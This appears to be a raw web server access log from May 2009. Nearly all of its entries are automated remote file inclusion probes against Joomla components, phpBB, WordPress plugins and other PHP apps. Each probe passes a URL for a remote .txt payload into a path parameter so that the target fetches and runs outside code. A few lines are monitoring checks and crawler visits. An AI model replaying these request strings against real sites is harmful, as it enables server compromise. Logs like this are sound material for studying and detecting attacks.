194.63.250.46 - - [31/May/2009:03:54:45 -0400] "GET /logs//modules/xfsection/modify.php?dir_module=http://stormpages.com/ichy/fx29id.txt?? HTTP/1.1" 404 232 "-" "Mozilla/5.0"
194.63.250.46 - - [31/May/2009:03:54:45 -0400] "GET /logs/access_log.Q109051500//modules/xfsection/modify.php?dir_module=http://stormpages.com/ichy/fx29id.txt?? HTTP/1.1" 404 254 "-" "Mozilla/5.0"
194.63.250.46 - - [31/May/2009:03:55:17 -0400] "GET /logs/access_log.Q109051000//modules/xfsection/modify.php?dir_module=http://stormpages.com/ichy/fx29id.txt?? HTTP/1.1" 404 254 "-" "Mozilla/5.0"
85.18.117.101 - - [31/May/2009:03:55:45 -0400] "GET /logs/access_log.Q109052100%20%20//search/**-screens-ppa-inc-functions.inc....php-sources-template.php/admin.php?include_path=http://h1353618.stratoserver.net/kampagnen/bildungsstreik2008/includes/id1.txt?? HTTP/1.1" 404 305 "-" "Mozilla/5.0"
85.18.117.101 - - [31/May/2009:03:56:01 -0400] "GET /logs/access_log.Q109050300%20%20//search/**-screens-ppa-inc-functions.inc....php-sources-template.php/admin.php?include_path=http://h1353618.stratoserver.net/kampagnen/bildungsstreik2008/includes/id1.txt?? HTTP/1.1" 404 305 "-" "Mozilla/5.0"
200.142.148.142 - - [31/May/2009:03:56:42 -0400] "GET /logs/access_log.Q109051800%20%20//administrator/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://www.sanagustin.edu.bo/modules/copyright.txt? HTTP/1.1" 404 279 "-" "Mozilla/5.0"
89.234.63.110 - - [31/May/2009:03:56:57 -0400] "GET //doceboCms/class/class.dashboard_cms.php?where_framework=http://www.nw.or.kr/bbs/icon/idxx.txt?? HTTP/1.1" 404 238 "-" "Mozilla/5.0"
89.234.63.110 - - [31/May/2009:03:56:57 -0400] "GET /logs/access_log.Q108081500%20%20//doceboCms/class/class.dashboard_cms.php?where_framework=http://www.nw.or.kr/bbs/icon/idxx.txt?? HTTP/1.1" 404 267 "-" "Mozilla/5.0"
89.234.63.110 - - [31/May/2009:03:56:57 -0400] "GET /logs//doceboCms/class/class.dashboard_cms.php?where_framework=http://www.nw.or.kr/bbs/icon/idxx.txt?? HTTP/1.1" 404 243 "-" "Mozilla/5.0"
195.34.78.110 - - [31/May/2009:03:57:18 -0400] "GET //administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://aene.de/eMCe/1.txt?? HTTP/1.1" 404 270 "-" "Mozilla/5.0"
195.34.78.110 - - [31/May/2009:03:57:18 -0400] "GET /logs//administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://aene.de/eMCe/1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0"
195.34.78.110 - - [31/May/2009:03:57:18 -0400] "GET /logs/access_log.Q109051700//administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://aene.de/eMCe/1.txt?? HTTP/1.1" 404 297 "-" "Mozilla/5.0"
195.34.78.110 - - [31/May/2009:03:57:19 -0400] "GET /logs/access_log.Q109052300//administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://aene.de/eMCe/1.txt?? HTTP/1.1" 404 297 "-" "Mozilla/5.0"
195.34.78.110 - - [31/May/2009:03:57:33 -0400] "GET //administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://aene.de/eMCe/1.txt?? HTTP/1.1" 404 270 "-" "Mozilla/5.0"
195.34.78.110 - - [31/May/2009:03:57:33 -0400] "GET /logs//administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://aene.de/eMCe/1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0"
195.34.78.110 - - [31/May/2009:03:57:34 -0400] "GET /logs/access_log.Q109051700//administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://aene.de/eMCe/1.txt?? HTTP/1.1" 404 297 "-" "Mozilla/5.0"
203.188.254.4 - - [31/May/2009:03:57:35 -0400] "GET /logs/access_log.Q109050300///?_SERVER[DOCUMENT_ROOT]=http://qigong-club.ru/bitrix/tools/v.txt?? HTTP/1.1" 404 227 "-" "libwww-perl/5.65"
203.188.254.4 - - [31/May/2009:03:57:36 -0400] "GET ///?_SERVER[DOCUMENT_ROOT]=http://qigong-club.ru/bitrix/tools/v.txt?? HTTP/1.1" 200 453 "-" "libwww-perl/5.65"
195.34.78.110 - - [31/May/2009:03:57:36 -0400] "GET /logs/access_log.Q109052300//administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://aene.de/eMCe/1.txt?? HTTP/1.1" 404 297 "-" "Mozilla/5.0"
203.188.254.4 - - [31/May/2009:03:57:36 -0400] "GET /logs///?_SERVER[DOCUMENT_ROOT]=http://qigong-club.ru/bitrix/tools/v.txt?? HTTP/1.1" 200 3568 "-" "libwww-perl/5.65"
221.139.104.104 - - [31/May/2009:03:57:45 -0400] "GET /logs/access_log.Q109051100//include/bbs.lib.inc.php?site_path=http://www.sanagustin.edu.bo/modules/copyright.txt??? HTTP/1.1" 404 249 "-" "Mozilla/5.0"
203.188.254.4 - - [31/May/2009:03:57:45 -0400] "GET /logs/access_log.Q109050300///?_SERVER[DOCUMENT_ROOT]=http://qigong-club.ru/bitrix/tools/v.txt?? HTTP/1.1" 404 227 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)"
221.139.104.104 - - [31/May/2009:03:57:46 -0400] "GET //include/bbs.lib.inc.php?site_path=http://www.sanagustin.edu.bo/modules/copyright.txt??? HTTP/1.1" 404 222 "-" "Mozilla/5.0"
221.139.104.104 - - [31/May/2009:03:57:46 -0400] "GET /logs//include/bbs.lib.inc.php?site_path=http://www.sanagustin.edu.bo/modules/copyright.txt??? HTTP/1.1" 404 227 "-" "Mozilla/5.0"
203.188.254.4 - - [31/May/2009:03:57:46 -0400] "GET ///?_SERVER[DOCUMENT_ROOT]=http://qigong-club.ru/bitrix/tools/v.txt?? HTTP/1.1" 200 453 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)"
221.139.104.104 - - [31/May/2009:03:57:51 -0400] "GET /logs//include/bbs.lib.inc.php?site_path=http://www.sanagustin.edu.bo/modules/copyright.txt? HTTP/1.1" 404 227 "-" "Mozilla/5.0"
221.139.104.104 - - [31/May/2009:03:57:51 -0400] "GET /logs/access_log.Q109051100//include/bbs.lib.inc.php?site_path=http://www.sanagustin.edu.bo/modules/copyright.txt? HTTP/1.1" 404 249 "-" "Mozilla/5.0"
218.185.20.88 - - [31/May/2009:03:57:51 -0400] "GET /logs/access_log.Q109051700/include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://www.kq-china.com/web//plugins/system/id1.txt??? HTTP/1.1" 404 263 "-" "Mozilla/5.0"
89.234.63.110 - - [31/May/2009:03:58:01 -0400] "GET /logs/access_log.Q109010700%20%20//doceboCms/class/class.dashboard_cms.php?where_framework=http://www.nw.or.kr/bbs/icon/idxx.txt?? HTTP/1.1" 404 267 "-" "Mozilla/5.0"
67.212.165.114 - - [31/May/2009:03:58:25 -0400] "GET //ktmllite/includes/ktedit/toolbar.php?dirDepth=http://www.bernardyni.ofm.pl/organy2/tmp/temp/id1.txt??? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
67.212.165.114 - - [31/May/2009:03:58:25 -0400] "GET /logs//ktmllite/includes/ktedit/toolbar.php?dirDepth=http://www.bernardyni.ofm.pl/organy2/tmp/temp/id1.txt??? HTTP/1.1" 404 240 "-" "Mozilla/5.0"
67.212.165.114 - - [31/May/2009:03:58:25 -0400] "GET /logs/access_log.Q109042200%20%20//ktmllite/includes/ktedit/toolbar.php?dirDepth=http://www.bernardyni.ofm.pl/organy2/tmp/temp/id1.txt??? HTTP/1.1" 404 264 "-" "Mozilla/5.0"
209.59.12.99 - - [31/May/2009:03:58:39 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
67.212.165.114 - - [31/May/2009:03:59:29 -0400] "GET /logs/access_log.Q109051700%20%20//ktmllite/includes/ktedit/toolbar.php?dirDepth=http://www.bernardyni.ofm.pl/organy2/tmp/temp/id1.txt??? HTTP/1.1" 404 264 "-" "Mozilla/5.0"
218.38.243.71 - - [31/May/2009:03:59:47 -0400] "GET /?sourcedir=http://210.110.97.14/~designpower/bbs///skin/zero_vote/1.txt???? HTTP/1.1" 200 409 "-" "Mozilla/5.0"
218.38.243.71 - - [31/May/2009:04:00:12 -0400] "GET /logs/?sourcedir=http://210.110.97.14/~designpower/bbs///skin/zero_vote/1.txt???? HTTP/1.1" 200 3562 "-" "Mozilla/5.0"
218.38.243.71 - - [31/May/2009:04:00:13 -0400] "GET /?sourcedir=http://210.110.97.14/~designpower/bbs///skin/zero_vote/1.txt???? HTTP/1.1" 200 409 "-" "Mozilla/5.0"
218.38.243.71 - - [31/May/2009:04:00:32 -0400] "GET /logs/access_log.Q109052300/?sourcedir=http://210.110.97.14/~designpower/bbs///skin/zero_vote/1.txt???? HTTP/1.1" 404 225 "-" "Mozilla/5.0"
124.0.73.2 - - [31/May/2009:04:00:48 -0400] "GET /logs//doceboCms/class/class.dashboard_cms.php?where_framework=http://www.nw.or.kr/bbs/icon/idxx.txt?? HTTP/1.1" 404 243 "-" "Mozilla/5.0"
124.0.73.2 - - [31/May/2009:04:00:48 -0400] "GET /logs/access_log.Q108081500%20%20//doceboCms/class/class.dashboard_cms.php?where_framework=http://www.nw.or.kr/bbs/icon/idxx.txt?? HTTP/1.1" 404 267 "-" "Mozilla/5.0"
89.234.63.110 - - [31/May/2009:04:02:02 -0400] "GET /logs/access_log.Q109051600//doceboCms/class/class.dashboard_cms.php?where_framework=http://www.nw.or.kr/bbs/icon/idxx.txt?? HTTP/1.1" 404 265 "-" "Mozilla/5.0"
124.0.73.2 - - [31/May/2009:04:02:40 -0400] "GET /logs/access_log.Q109010700%20%20//doceboCms/class/class.dashboard_cms.php?where_framework=http://www.nw.or.kr/bbs/icon/idxx.txt?? HTTP/1.1" 404 267 "-" "Mozilla/5.0"
221.139.104.104 - - [31/May/2009:04:03:40 -0400] "GET /logs/access_log.Q109051100%20%20//include/bbs.lib.inc.php?site_path=http://www.sanagustin.edu.bo/modules/copyright.txt??? HTTP/1.1" 404 251 "-" "Mozilla/5.0"
209.59.12.99 - - [31/May/2009:04:03:51 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
89.234.63.110 - - [31/May/2009:04:04:17 -0400] "GET /logs/access_log.Q109052200//doceboCms/class/class.dashboard_cms.php?where_framework=http://www.nw.or.kr/bbs/icon/idxx.txt?? HTTP/1.1" 404 265 "-" "Mozilla/5.0"
64.56.64.57 - - [31/May/2009:04:05:58 -0400] "GET /robots.txt HTTP/1.0" 404 208 "-" "ru_com_viewer (larbin2.6.3@unspecified.mail)"
64.56.64.57 - - [31/May/2009:04:06:00 -0400] "GET /logs/access_log.Q109051600 HTTP/1.0" 200 2853952 "-" "ru_com_viewer larbin2.6.3@unspecified.mail"
195.34.78.110 - - [31/May/2009:04:07:15 -0400] "GET /logs/access_log.Q109051700%20%20//administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://aene.de/eMCe/1.txt?? HTTP/1.1" 404 299 "-" "Mozilla/5.0"
195.34.78.110 - - [31/May/2009:04:07:21 -0400] "GET /logs/access_log.Q109051700%20%20//administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://aene.de/eMCe/1.txt?? HTTP/1.1" 404 299 "-" "Mozilla/5.0"
86.39.131.85 - - [31/May/2009:04:08:07 -0400] "GET /administrator/components/com_jcs/jcs.function.php?mosConfig_absolute_path=http://motorcrew.co.kr/home/img/kernel/lib/s/id8.txt??? HTTP/1.1" 404 247 "-" "libwww-perl/5.79"
86.39.131.85 - - [31/May/2009:04:08:08 -0400] "GET /logs/access_log.Q109050900/administrator/components/com_jcs/jcs.function.php?mosConfig_absolute_path=http://motorcrew.co.kr/home/img/kernel/lib/s/id8.txt??? HTTP/1.1" 404 274 "-" "libwww-perl/5.79"
86.39.131.85 - - [31/May/2009:04:08:08 -0400] "GET /logs/administrator/components/com_jcs/jcs.function.php?mosConfig_absolute_path=http://motorcrew.co.kr/home/img/kernel/lib/s/id8.txt??? HTTP/1.1" 404 252 "-" "libwww-perl/5.79"
209.59.12.99 - - [31/May/2009:04:08:51 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
195.34.78.110 - - [31/May/2009:04:08:53 -0400] "GET /logs/access_log.Q109050300%20%20//administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://aene.de/eMCe/1.txt?? HTTP/1.1" 404 299 "-" "Mozilla/5.0"
195.34.78.110 - - [31/May/2009:04:08:55 -0400] "GET /logs/access_log.Q109050300%20%20//administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://aene.de/eMCe/1.txt?? HTTP/1.1" 404 299 "-" "Mozilla/5.0"
193.239.4.3 - - [31/May/2009:04:08:57 -0400] "GET /logs/access_log.Q109052200///?_SERVER[DOCUMENT_ROOT]=http://qigong-club.ru/bitrix/tools/v.txt?? HTTP/1.1" 404 227 "-" "libwww-perl/5.805"
221.139.104.104 - - [31/May/2009:04:09:10 -0400] "GET /logs/access_log.Q109051100%20%20//include/bbs.lib.inc.php?site_path=http://www.sanagustin.edu.bo/modules/copyright.txt? HTTP/1.1" 404 251 "-" "Mozilla/5.0"
193.239.4.3 - - [31/May/2009:04:09:54 -0400] "GET /errors.php?error=http://qigong-club.ru/bitrix/tools/idrb1.txt? HTTP/1.1" 404 208 "-" "Mozilla/5.0"
193.239.4.3 - - [31/May/2009:04:09:54 -0400] "GET /logs/errors.php?error=http://qigong-club.ru/bitrix/tools/idrb1.txt? HTTP/1.1" 404 213 "-" "Mozilla/5.0"
123.143.98.5 - - [31/May/2009:04:10:02 -0400] "GET /logs/access_log.Q109051700%20%20//excelwriter/Writer/BIFFwriter.php?mosConfig_absolute_path=http://www.itemsnsale.com//js/id1.txt?? HTTP/1.1" 404 261 "-" "Mozilla/5.0"
123.143.98.5 - - [31/May/2009:04:10:02 -0400] "GET /logs//excelwriter/Writer/BIFFwriter.php?mosConfig_absolute_path=http://www.itemsnsale.com//js/id1.txt?? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
123.143.98.5 - - [31/May/2009:04:10:02 -0400] "GET //excelwriter/Writer/BIFFwriter.php?mosConfig_absolute_path=http://www.itemsnsale.com//js/id1.txt?? HTTP/1.1" 404 232 "-" "Mozilla/5.0"
123.143.98.5 - - [31/May/2009:04:10:32 -0400] "GET /logs/access_log.Q109050700%20%20//excelwriter/Writer/BIFFwriter.php?mosConfig_absolute_path=http://www.itemsnsale.com//js/id1.txt?? HTTP/1.1" 404 261 "-" "Mozilla/5.0"
203.194.204.129 - - [31/May/2009:04:11:33 -0400] "GET /includes/functions_admin.php?phpbb_root_path=http://www.triton-friendlyclub.com/2009/id.txt?? HTTP/1.1" 404 226 "-" "Mozilla/5.0"
203.194.204.129 - - [31/May/2009:04:11:33 -0400] "GET /logs/includes/functions_admin.php?phpbb_root_path=http://www.triton-friendlyclub.com/2009/id.txt?? HTTP/1.1" 404 231 "-" "Mozilla/5.0"
203.194.204.129 - - [31/May/2009:04:11:33 -0400] "GET /logs/access_log.Q109052200/includes/functions_admin.php?phpbb_root_path=http://www.triton-friendlyclub.com/2009/id.txt?? HTTP/1.1" 404 253 "-" "Mozilla/5.0"
86.39.131.85 - - [31/May/2009:04:11:46 -0400] "GET /logs/access_log.Q109051700/components/com_mp3_allopass/allopass.php?mosConfig_live_site=http://motorcrew.co.kr/home/img/kernel/lib/s/id8.txt??? HTTP/1.1" 404 265 "-" "libwww-perl/5.79"
86.39.131.85 - - [31/May/2009:04:11:46 -0400] "GET /components/com_mp3_allopass/allopass.php?mosConfig_live_site=http://motorcrew.co.kr/home/img/kernel/lib/s/id8.txt??? HTTP/1.1" 404 238 "-" "libwww-perl/5.79"
86.39.131.85 - - [31/May/2009:04:11:47 -0400] "GET /logs/components/com_mp3_allopass/allopass.php?mosConfig_live_site=http://motorcrew.co.kr/home/img/kernel/lib/s/id8.txt??? HTTP/1.1" 404 243 "-" "libwww-perl/5.79"
86.39.131.85 - - [31/May/2009:04:12:02 -0400] "GET /logs/access_log.Q109052100/administrator/components/com_jcs/jcs.function.php?mosConfig_absolute_path=http://motorcrew.co.kr/home/img/kernel/lib/s/id8.txt??? HTTP/1.1" 404 274 "-" "libwww-perl/5.79"
86.39.131.85 - - [31/May/2009:04:12:12 -0400] "GET /administrator/components/com_jcs/view/register.php?mosConfig_absolute_path=http://motorcrew.co.kr/home/img/kernel/lib/s/id8.txt??? HTTP/1.1" 404 248 "-" "libwww-perl/5.79"
86.39.131.85 - - [31/May/2009:04:12:13 -0400] "GET /logs/administrator/components/com_jcs/view/register.php?mosConfig_absolute_path=http://motorcrew.co.kr/home/img/kernel/lib/s/id8.txt??? HTTP/1.1" 404 253 "-" "libwww-perl/5.79"
86.39.131.85 - - [31/May/2009:04:12:13 -0400] "GET /logs/access_log.Q109050900/administrator/components/com_jcs/view/register.php?mosConfig_absolute_path=http://motorcrew.co.kr/home/img/kernel/lib/s/id8.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79"
200.142.148.142 - - [31/May/2009:04:12:48 -0400] "GET /logs/access_log.Q109051100//include/bbs.lib.inc.php?site_path=http://www.sanagustin.edu.bo/modules/copyright.txt? HTTP/1.1" 404 249 "-" "Mozilla/5.0"
200.142.148.142 - - [31/May/2009:04:12:48 -0400] "GET /logs//include/bbs.lib.inc.php?site_path=http://www.sanagustin.edu.bo/modules/copyright.txt? HTTP/1.1" 404 227 "-" "Mozilla/5.0"
203.194.204.129 - - [31/May/2009:04:13:05 -0400] "GET /logs/access_log.Q109050700/includes/functions_admin.php?phpbb_root_path=http://www.triton-friendlyclub.com/2009/id.txt?? HTTP/1.1" 404 253 "-" "Mozilla/5.0"
86.39.131.85 - - [31/May/2009:04:13:08 -0400] "GET /logs/error_log.Q108052600/components/com_mp3_allopass/allopass.php?mosConfig_live_site=http://motorcrew.co.kr/home/img/kernel/lib/s/id8.txt??? HTTP/1.1" 404 264 "-" "libwww-perl/5.79"
209.59.12.99 - - [31/May/2009:04:13:52 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
221.139.104.104 - - [31/May/2009:04:15:10 -0400] "GET /logs/error_log.Q109020900%20%20//include/bbs.lib.inc.php?site_path=http://www.sanagustin.edu.bo/modules/copyright.txt? HTTP/1.1" 404 250 "-" "Mozilla/5.0"
86.39.131.85 - - [31/May/2009:04:15:19 -0400] "GET /logs/access_log.Q109052100/administrator/components/com_jcs/view/register.php?mosConfig_absolute_path=http://motorcrew.co.kr/home/img/kernel/lib/s/id8.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79"
116.36.213.166 - - [31/May/2009:04:16:24 -0400] "GET ///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.bungeholes.com/id1.txt? HTTP/1.1" 404 250 "-" "Mozilla/5.0"
116.36.213.166 - - [31/May/2009:04:16:25 -0400] "GET /logs///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.bungeholes.com/id1.txt? HTTP/1.1" 404 255 "-" "Mozilla/5.0"
116.36.213.166 - - [31/May/2009:04:16:26 -0400] "GET /logs/access_log.Q109051600///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.bungeholes.com/id1.txt? HTTP/1.1" 404 277 "-" "Mozilla/5.0"
116.36.213.166 - - [31/May/2009:04:16:33 -0400] "GET ///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.bungeholes.com/id1.txt? HTTP/1.1" 404 250 "-" "Mozilla/5.0"
116.36.213.166 - - [31/May/2009:04:16:34 -0400] "GET /logs///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.bungeholes.com/id1.txt? HTTP/1.1" 404 255 "-" "Mozilla/5.0"
116.36.213.166 - - [31/May/2009:04:16:34 -0400] "GET /logs/access_log.Q109051600///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.bungeholes.com/id1.txt? HTTP/1.1" 404 277 "-" "Mozilla/5.0"
83.103.72.130 - - [31/May/2009:04:17:13 -0400] "GET /logs/access_log.Q109051100%20%20//program/modules/mods_full/shopping_cart/includes/login.php?_SESSION%5Bdocroot_path%5D=http://www.omsklyvr.omit.ru/id1.txt?? HTTP/1.1" 404 286 "-" "Mozilla/5.0"
83.103.72.130 - - [31/May/2009:04:17:13 -0400] "GET //program/modules/mods_full/shopping_cart/includes/login.php?_SESSION%5Bdocroot_path%5D=http://www.omsklyvr.omit.ru/id1.txt?? HTTP/1.1" 404 257 "-" "Mozilla/5.0"
83.103.72.130 - - [31/May/2009:04:17:13 -0400] "GET /logs//program/modules/mods_full/shopping_cart/includes/login.php?_SESSION%5Bdocroot_path%5D=http://www.omsklyvr.omit.ru/id1.txt?? HTTP/1.1" 404 262 "-" "Mozilla/5.0"
200.142.148.142 - - [31/May/2009:04:18:02 -0400] "GET /logs/access_log.Q109051700//administrator/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://www.sanagustin.edu.bo/modules/copyright.txt? HTTP/1.1" 404 277 "-" "Mozilla/5.0"
218.150.78.203 - - [31/May/2009:04:18:07 -0400] "GET //wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://www.triton-friendlyclub.com/2009/v5id1.txt?? HTTP/1.1" 404 260 "-" "Mozilla/5.0"
218.150.78.203 - - [31/May/2009:04:18:07 -0400] "GET /logs//wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://www.triton-friendlyclub.com/2009/v5id1.txt?? HTTP/1.1" 404 265 "-" "Mozilla/5.0"
74.6.8.108 - - [31/May/2009:04:18:23 -0400] "GET /logs/error_log.Q107123000 HTTP/1.0" 404 223 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
221.139.104.104 - - [31/May/2009:04:18:30 -0400] "GET //include/admin.lib.inc.php?site_path=http://www.dwno.or.kr/bbs/config/id1.txt?? HTTP/1.1" 404 224 "-" "Mozilla/5.0"
221.139.104.104 - - [31/May/2009:04:18:30 -0400] "GET /logs//include/admin.lib.inc.php?site_path=http://www.dwno.or.kr/bbs/config/id1.txt?? HTTP/1.1" 404 229 "-" "Mozilla/5.0"
221.139.104.104 - - [31/May/2009:04:18:30 -0400] "GET /logs/access_log.Q109052200//include/admin.lib.inc.php?site_path=http://www.dwno.or.kr/bbs/config/id1.txt?? HTTP/1.1" 404 251 "-" "Mozilla/5.0"
221.139.104.104 - - [31/May/2009:04:18:40 -0400] "GET /logs/access_log.Q109051700//include/admin.lib.inc.php?site_path=http://www.dwno.or.kr/bbs/config/id1.txt?? HTTP/1.1" 404 251 "-" "Mozilla/5.0"
218.150.78.203 - - [31/May/2009:04:18:45 -0400] "GET //wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://www.triton-friendlyclub.com/2009/v5id1.txt?? HTTP/1.1" 404 260 "-" "Mozilla/5.0"
218.150.78.203 - - [31/May/2009:04:18:45 -0400] "GET /logs//wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://www.triton-friendlyclub.com/2009/v5id1.txt?? HTTP/1.1" 404 265 "-" "Mozilla/5.0"
218.150.78.203 - - [31/May/2009:04:18:45 -0400] "GET /logs/access_log.Q109052200//wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://www.triton-friendlyclub.com/2009/v5id1.txt?? HTTP/1.1" 404 287 "-" "Mozilla/5.0"
209.59.12.99 - - [31/May/2009:04:18:52 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
218.150.78.203 - - [31/May/2009:04:18:58 -0400] "GET /logs/access_log.Q109050900//wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://www.triton-friendlyclub.com/2009/v5id1.txt?? HTTP/1.1" 404 287 "-" "Mozilla/5.0"
221.139.104.104 - - [31/May/2009:04:20:02 -0400] "GET /logs/error_log.Q108051600//include/bbs.lib.inc.php?site_path=http://www.sanagustin.edu.bo/modules/copyright.txt? HTTP/1.1" 404 248 "-" "Mozilla/5.0"
124.217.216.86 - - [31/May/2009:04:20:32 -0400] "GET /logs/?DOCUMENT_ROOT=http://largeface.com/gnuboard4/tail/fid.txt????? HTTP/1.1" 200 3562 "-" "Mozilla/5.0"
124.217.216.86 - - [31/May/2009:04:20:32 -0400] "GET /?DOCUMENT_ROOT=http://largeface.com/gnuboard4/tail/fid.txt????? HTTP/1.1" 200 409 "-" "Mozilla/5.0"
83.103.72.130 - - [31/May/2009:04:20:47 -0400] "GET /logs/access_log.Q109051100//program/modules/mods_full/shopping_cart/includes/login.php?_SESSION%5Bdocroot_path%5D=http://www.omsklyvr.omit.ru/id1.txt?? HTTP/1.1" 404 284 "-" "Mozilla/5.0"
200.142.148.142 - - [31/May/2009:04:21:49 -0400] "GET /logs/access_log.Q109051800//administrator/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://www.sanagustin.edu.bo/modules/copyright.txt? HTTP/1.1" 404 277 "-" "Mozilla/5.0"
124.217.216.86 - - [31/May/2009:04:22:06 -0400] "GET /logs/access_log.Q108081500%20%20/?DOCUMENT_ROOT=http://largeface.com/gnuboard4/tail/fid.txt????? HTTP/1.1" 404 227 "-" "Mozilla/5.0"
116.36.213.166 - - [31/May/2009:04:23:07 -0400] "GET /logs/access_log.Q109042200///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.bungeholes.com/id1.txt? HTTP/1.1" 404 277 "-" "Mozilla/5.0"
116.36.213.166 - - [31/May/2009:04:23:18 -0400] "GET /logs/access_log.Q109042200///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.bungeholes.com/id1.txt? HTTP/1.1" 404 277 "-" "Mozilla/5.0"
221.139.104.104 - - [31/May/2009:04:23:38 -0400] "GET /?DOCUMENT_ROOT=http://largeface.com/gnuboard4/tail/fid.txt? HTTP/1.1" 200 409 "-" "Mozilla/5.0"
221.139.104.104 - - [31/May/2009:04:23:38 -0400] "GET /logs/?DOCUMENT_ROOT=http://largeface.com/gnuboard4/tail/fid.txt? HTTP/1.1" 200 3562 "-" "Mozilla/5.0"
209.59.12.99 - - [31/May/2009:04:23:54 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
116.36.213.166 - - [31/May/2009:04:24:06 -0400] "GET /logs/access_log.Q109051600%20%20///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.bungeholes.com/id1.txt? HTTP/1.1" 404 279 "-" "Mozilla/5.0"
116.36.213.166 - - [31/May/2009:04:24:15 -0400] "GET /logs/access_log.Q109051600%20%20///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.bungeholes.com/id1.txt? HTTP/1.1" 404 279 "-" "Mozilla/5.0"
116.36.213.166 - - [31/May/2009:04:24:23 -0400] "GET /?DOCUMENT_ROOT=http://stelsis.ru//templates/fxid.txt? HTTP/1.1" 200 409 "-" "Mozilla/5.0"
116.36.213.166 - - [31/May/2009:04:24:24 -0400] "GET /logs/?DOCUMENT_ROOT=http://stelsis.ru//templates/fxid.txt? HTTP/1.1" 200 3562 "-" "Mozilla/5.0"
200.142.148.142 - - [31/May/2009:04:25:26 -0400] "GET /logs/error_log.Q108051600//include/bbs.lib.inc.php?site_path=http://www.sanagustin.edu.bo/modules/copyright.txt? HTTP/1.1" 404 248 "-" "Mozilla/5.0"
116.36.213.166 - - [31/May/2009:04:28:06 -0400] "GET /logs/access_log.Q109042200%20%20///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.bungeholes.com/id1.txt? HTTP/1.1" 404 279 "-" "Mozilla/5.0"
116.36.213.166 - - [31/May/2009:04:28:11 -0400] "GET /logs/access_log.Q109042200%20%20///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.bungeholes.com/id1.txt? HTTP/1.1" 404 279 "-" "Mozilla/5.0"
209.59.12.99 - - [31/May/2009:04:28:55 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
221.139.104.104 - - [31/May/2009:04:29:10 -0400] "GET /logs/appserv/main.php?appserv_root=http://www.dwno.or.kr/bbs/config/id1.txt?? HTTP/1.1" 404 219 "-" "Mozilla/5.0"
221.139.104.104 - - [31/May/2009:04:29:10 -0400] "GET /appserv/main.php?appserv_root=http://www.dwno.or.kr/bbs/config/id1.txt?? HTTP/1.1" 404 214 "-" "Mozilla/5.0"
221.139.104.104 - - [31/May/2009:04:29:19 -0400] "GET /logs/access_log.Q109051800/appserv/main.php?appserv_root=http://www.dwno.or.kr/bbs/config/id1.txt?? HTTP/1.1" 404 241 "-" "Mozilla/5.0"
67.212.165.114 - - [31/May/2009:04:30:46 -0400] "GET /logs/access_log.Q109051700//ktmllite/includes/ktedit/toolbar.php?dirDepth=http://www.bernardyni.ofm.pl/organy2/tmp/temp/id1.txt??? HTTP/1.1" 404 262 "-" "Mozilla/5.0"
67.212.165.114 - - [31/May/2009:04:30:46 -0400] "GET /logs/access_log.Q109050900//ktmllite/includes/ktedit/toolbar.php?dirDepth=http://www.bernardyni.ofm.pl/organy2/tmp/temp/id1.txt??? HTTP/1.1" 404 262 "-" "Mozilla/5.0"
